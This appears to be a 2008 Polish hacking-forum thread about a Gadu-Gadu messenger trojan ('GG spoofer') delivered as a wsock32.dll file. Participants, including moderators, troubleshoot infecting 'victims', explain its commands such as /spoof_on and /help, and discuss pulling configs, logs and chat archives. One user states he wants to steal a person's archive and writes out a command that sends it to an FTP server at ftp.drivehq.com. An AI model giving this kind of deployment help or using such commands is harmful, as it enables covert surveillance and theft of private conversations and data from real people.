GG spoofer by Grzonu

smajl

Użytkownik
Dołączył
Luty 9, 2008
Posty
9
<div class='quotetop'>CYTAT(Szymon111 @ 13.06.2008, 22:44) <{POST_SNAPBACK}></div>
ja tego używałem u siebie na kompie, pisałem na drugie konto i wtedy dostawałem takie wiadomości: dll się dodało i wysyłałem komendy i ona pojawiały się w drugim oknie
/help
13084995 (11-06-2008 21:09)
WŁĄCZONO
13084995 (11-06-2008 21:10)
/5p00f_0n |1186700|
13084995 (11-06-2008 21:11)
?



Więc pokazują się chyba u odbiorcy[/b]

"Ofiara nie widzi tych komunikatów."

Panie u mnie to samo :x
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
Bo nie ma być /5p00f_0n tylko /spoof_on. Jak chcesz żeby nie pojawiała się żadna wiadomość zaczynająca się na / (czyli np. źle napisana komenda) to zainwestuj w wersję VIP, zdaje się że posiada taką opcję
<
 

daisy

Użytkownik
Dołączył
Lipiec 27, 2008
Posty
3
Mam pytanie: czy osoba, której wysłałamy DLL'kę musi mieć nasz numer gg na swojej liście kontaktów, aby komendy zadziałały? I czy status tej osoby (np. 'dostępny', 'zaraz wracam') ma tu jakieś znaczenie podczas wysyłania komend? Z góry dzięki za odp.
 

daisy

Użytkownik
Dołączył
Lipiec 27, 2008
Posty
3
Hxv, dzięki za szybką odpowiedź. Mam jeszcze jedno pytanko. Załóżmy, że posiadam dwa nr gg na jednym komputerze, wysyłam plik 'ofierze' z jednego numeru, po czym wpisuję komendy z drugiego nr. Czy wtedy plik dll zadziała tak jak powinien? Testowałam na sobie i wszystko działało ok, nie wiem tylko jak to jest w przypadku innego komputera. I czy ma znaczenie to, w jaki sposób 'ofiara' łączy się z netem, np. jeśli jest spoza sieci lokalnej?
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
Spoofer działa niezależnie od numeru z którego piszesz. Tak samo jest z siecią - nie ważne czy ma zewnętrzny czy wewnętrzny IP ponieważ cała komunikacja odbywa się przez GG.
 

michal_fruti

Użytkownik
Dołączył
Sierpień 2, 2008
Posty
2
a ja mam problem dll się nie dodaje. pisze z jednego kompa a na drugim wszystko widać:
Ja 1:21:28
/ help
Ja 1:26:05
/help
Ja 1:26:21
/ help
drugie konto - drugi komp 1:28:26
wszystko widać u mnie
Proszę o jakieś rady
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
Sprawdź czy w katalogu z GG jest plik wsock32.dll. Jak jest to uruchom ponownie komunikator, powinno zadziałać. Jak nie ma to znaczy że spoofer się nie zainstalował.
 

michal_fruti

Użytkownik
Dołączył
Sierpień 2, 2008
Posty
2
No właśnie w tym problem, że się nie zainstalowało i nie wiem czego jeszcze próbować. Nie wiem czy to stanowi problem, że na kompie na którym chce to zainstalować mam xp, a na laptopie viste. Lecz wogóle nie chce się to zainstalować. na viście nie próbowałem.
 

Muniek2

Użytkownik
Dołączył
Lipiec 8, 2008
Posty
12
I pojawia się kolejny propblem...;/ jak osoba , do której wysłałem klika w dll'kę to ma komunikat, ze nie ma dostępu czy cós.Jak testowałem to troche czasu temu to było ok ale teraz dupa

Pozdrawiam
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
Możliwe że ma już zainstalowany spoofer. Jeśli gadu-gadu jest uruchomione to nie można nadpisać pliku który używa i stąd ten błąd.
 

Muniek2

Użytkownik
Dołączył
Lipiec 8, 2008
Posty
12
Nie wiem czy u was tak smo ale od wczoraj mam same problemy z tym spooferem.1.Był błąd, no dobra może faktycznie ma zainstalowanego. 2.Jak chcialem pobrac configi,log,lub archiwa to nieotrzymywałem wiadomości zwrotnej i osoba od ktorej chciałem pobrac spytała się O CO CHODZI??!!.Sprawdzałem nie mam zainstalowanej dll'ki
<
mam nadzieje , ze to tylko chwilowe ;/
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
chodzi o to mniej wiecej ze aby dll`ka prawidłowo działała gg musi ja wczytac a zeby ja wczytac to musi byc w katalogu gg.
jak chcesz prawdzic czy działa to napisz /help i bedziesz widzial czy dziala czy nie
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
wez sciagnij program reshack albo PE explorer i wyciagnij ja sam z programu(z zasobów)
 

tommy3

Użytkownik
Dołączył
Sierpień 5, 2008
Posty
4
Witam wszystkich, jeśli chodzi o tematykę tej strony to jestem całkowicie zielony, jednak chciałbym skutecznie wykraśc archiwum jednej osobie. Z tego co tu czytam wszystko wydaje się zrozumiałe. Ściągnąłem dll'kę i założyłem konto na driwehq.com, na początku spróbowałem na sobie żeby zobaczy jak to działa i wszystko jest OK
smile.gif
Trojan wysyła mi konfigi, logi i archiwa na serwer ftp. Następnie podrzuciłem dll'kę ofierze i tu zaczęły się problemy, wysyłając jej te wszystkie komendy ona je po prostu widziała. A w dll'kę kliknęła, tego jestem pewien. Co się więc stało, że się nie zainstalowała do folderu gg? Może ma dobry program antywirusowy? Swoją drogą jakie antywiry na dzień dzisiejszy radzą sobie z tym trojanem? Jest jeszcze możliwośc, że źle wpisuję komendy (u mnie działają, więc byłoby to dziwne), zerknijcie sami:

Przykładowo login do driwehq mam: tomek, a hasło: tommy3
Moja komenda wygląda następująco: /sendarch |tomek|tommy3|ftp.drivehq.com|

Jak testuję to na sobie to działa, co o tym myślicie?
 

ziolo22

Użytkownik
Dołączył
Sierpień 5, 2008
Posty
16
Tommy3 wydaje mi się, że ten ktoś musi zrestartować czyli wyłączyć i ponownie włączyć komunikator...
 

tommy3

Użytkownik
Dołączył
Sierpień 5, 2008
Posty
4
<div class='quotetop'>CYTAT(ziolo22 @ 5.08.2008, 10:28) <{POST_SNAPBACK}></div>
Tommy3 wydaje mi się, że ten ktoś musi zrestartować czyli wyłączyć i ponownie włączyć komunikator...[/b]

I tak właśnie się stało, trojana podesłałem przedwczoraj, a atak przeprowadziłem wczoraj. Ta osoba na 100% na noc wyłącza kompa, stąd ta pewnośc że wszystko powinno działac:)
 
Do góry Bottom